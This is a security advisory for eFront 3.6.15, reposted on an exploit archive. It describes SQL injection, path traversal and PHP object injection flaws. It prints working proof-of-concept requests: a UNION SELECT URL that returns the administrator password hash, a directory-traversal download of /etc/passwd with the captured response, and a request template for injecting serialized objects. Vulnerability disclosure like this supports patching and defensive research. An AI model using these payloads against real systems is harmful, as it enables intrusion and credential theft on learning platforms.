eFront 3.6.15 - Multiple Vulnerabilities

eFront 3.6.15 Multiple SQL Injection Vulnerabilities
 
[+] Author: Filippo Roncari | Luca De Fulgentis
[+] Target: eFront 
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: [email protected] 
 
 
[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”. 
 
 
[+] Vulnerability Details
The new_sidebar.php module, which handles the left side bar in eFront 3.6.15 default theme, is affected by two SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS’s user privileges.
 
 
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.
 
 
[+] Proof of Concept (PoC)
Any unprivileged authenticated user (e.g., student or professor) can exploit this issue, taking into account that:
1. An attacker has to access a lesson (= click on any open lesson) before executing the malicious request.
2. If logged as a Student, a potential attacker has to access a lesson for which his User Type has “content” set to hidden. 
3. The default theme, or others that use the sidebar, must be in use.
 
    [!] PoC URL
    -----------------------------
    http://target.site/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1 
    -----------------------------
 
The administrator password hash is returned directly in the HTML body as part of the forum link in the sidebar menu.
 
    [!] HTTP Response
    -----------------------------
    HTTP/1.1 200 OK
    Date: Thu, 09 Apr 2015 22:42:19 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html
    Content-Length: 28786
 
    [...]
    <div class = "menuOption" name="lessonSpecific" id="forum_a" > <table>
    <tr> <td>
    target="mainframe">
    <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b"
    <img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a>
    </td>
    <td class = "menuListOption" >
    <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="Forum" target="mainframe">Forum</a>
    </td> </tr>
    </table> </div>
    [...]
    -----------------------------
 
 
For further details and explanations check the full advisory. 

[+] Proof of Concept (PoC)
 
    [!] PoC URL
    -----------------------------
    http://target.site/www/view_file.php?action=download&file=/[EFRONT_BASE_PATH]/../../../../../../etc/passwd/
    _____________________________
 
    [!] HTTP Request
    -----------------------------
    GET /test/efront/www/view_file.php?action=download&file=/Applications/MAMP/htdocs/test/efront/../../../../../etc/passwd/ HTTP/1.1
    Host: localhost
    Cookie: display_all_courses=1; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; SQLiteManager_currentLangue=6;
    PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; parent_sid=d36bed784e063e65cf31721f8ec7a0bd
    -----------------------------
 
    [!] HTTP Response
    -----------------------------
    HTTP/1.1 200 OK
    Date: Mon, 30 Mar 2015 13:20:43 GMT Content-Description: File Transfer
    Content-Disposition: attachment; filename="passwd" Content-Transfer-Encoding: binary
    Expires: 0
    Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public
    Content-Length: 5253
    Content-Type: application/download
 
    ##
    # User Database #
    # Note that this file is consulted directly only when the system is running
    # in single-user mode. At other times this information is provided by
    # Open Directory. #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
 
    [...]
    _____________________________
 
For technical details and explanations check the full advisory. 

[+] Vulnerability Details
eFront 3.6.15 is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated as a Professor, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.
 
 
[+] Technical Details
A PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non-sanitized user input. 
 
    [!] File: libraries/includes/copy.php
    -----------------------------
    if ($_GET['transfered']) {
        $transferedNodesCheck = unserialize($_GET['transfered']); 
    }
    $copiedTests = array();
    $copiedUnits = array();
    $map = array();
    foreach ($nodeOrders as $value) {
            list($id, $parentContentId) = explode("-", $value);
            if (!in_array($id, $transferedNodesCheck)) {
    -----------------------------
 
The injection affects the "transfered" parameter.
 
 
[+] Proof of Concept (PoC)
 
 
    [!] HTTP Request
    -----------------------------
    GET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[SERIALIZED_ARBITRARY_OBJECT]&mode&a jax=ajax&csrf_id=6ebb0b3aee60a1764e780e8494985a8e HTTP/1.1
    Host: localhost
    Proxy-Connection: keep-alive
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    X-Prototype-Version: 1.7
    X-Requested-With: XMLHttpRequest
    Cookie: display_all_courses=1; setFormRowsHidden=0; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; professor_sidebar=hidden; professor_sidebarMode=automatic; parent_sid=6ebb0b3aee60a1764e780e8494985a8e
    -----------------------------
 
A common way to exploit this vulnerability is to find a PHP magic method that can be abused and inject a properly crafted arbitrary object in order to trigger it. Although a deeper analysis has not been performed, no useful PHP magic methods have been identified in order to exploit this specific vulnerability. Because the unmarshalled user input $transferedNodesCheck is exclusively used within an in_array() call, only __wakeup() and __destruct() methods could be abused to exploit the issue. However, none of those lends itself to the purpose. The vulnerability could still be abused in case of PHP vulnerable version (e.g., CVE-2014-8142) to create denial of service, leak memory and, under certain conditions, execute code.

#  0day.today [2018-01-02]  #